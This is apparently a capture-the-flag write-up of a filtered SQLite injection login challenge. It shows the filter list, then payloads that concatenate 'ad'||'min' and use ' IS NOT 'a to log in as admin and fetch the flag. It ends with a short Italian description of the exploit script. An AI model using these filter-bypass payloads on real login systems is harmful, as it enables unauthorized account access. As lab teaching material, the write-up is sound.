Given the obvious message, we already know it’s an SQL Injection. In the hints, I found that it’s related to SQLite. The first thing I did to test was send username=a and password=a:
First Try
The query being executed is shown at the top (SELECT username, password FROM users WHERE username='a' AND password='a'), so this is not a form of blind injection. Our goal is to likely log in as admin, given the error message not admin. In the challenge description, there was another link:
Filter
As we can see, filters are applied to the query. I cannot use or, and, true, false, union, like, =, >, <, ;, --, /*, */, or admin. So, I need to come up with another way to access as the admin user. After doing a bit of research, I found a page that was quite helpful: https://www.sqlitetutorial.net/. Let’s proceed with the exploitation.
๐ฌ Vulnerability Analysis
Potential Vulnerabilities
SQL Injection
๐ฏ Solution Path
Exploitation Steps
Initial setup
The first thing we need to figure out is how to form the admin username, since comments are blocked and admin is filtered. So, continuing to search in the Functions->String Functions section (https://www.sqlitetutorial.net/sqlite-string-functions/), I found the string concatenation operator in SQLite, which is ||. Using this operator, we can concatenate two strings to bypass the filter on admin.
1
ad'||'min
This way, by placing || outside the quotes, it is treated as a command and performs the concatenation. Now that we know how to form the word admin for the username, we need a way to validate the password and make the query return True even if we don’t know the actual password. Let’s proceed with the exploitation.
Exploitation
Continuing the search, I found the IS operator, which can also be used with a negation IS NOT. I initially tried:
1
' IS '
to form the final query: SELECT username, password FROM users WHERE username='ad'||'min' AND password='' IS '', but it didn’t work. I thought '' would be equal to '', and therefore it should have returned True. So, I tried the negation instead:
1
' IS NOT 'a
forming the final query: SELECT username, password FROM users WHERE username='ad'||'min' AND password='' IS NOT 'a'. This time, it should definitely return True since '' is not equal to 'a'. Indeed, after testing the injection:
Injection
it succeeded, and as indicated by the message, I then visited the /filter.php route and was able to obtain the flag.
Flag capture
Manual Flag
๐ ๏ธ Exploitation Process
Approach
L’exploit invia la payload tramite una richiesta POST per sfruttare la vulnerabilitร di SQL Injection, quindi esegue una richiesta GET alla rotta /filter.php per ottenere la flag, estraendola utilizzando una regex applicata alla risposta del server.
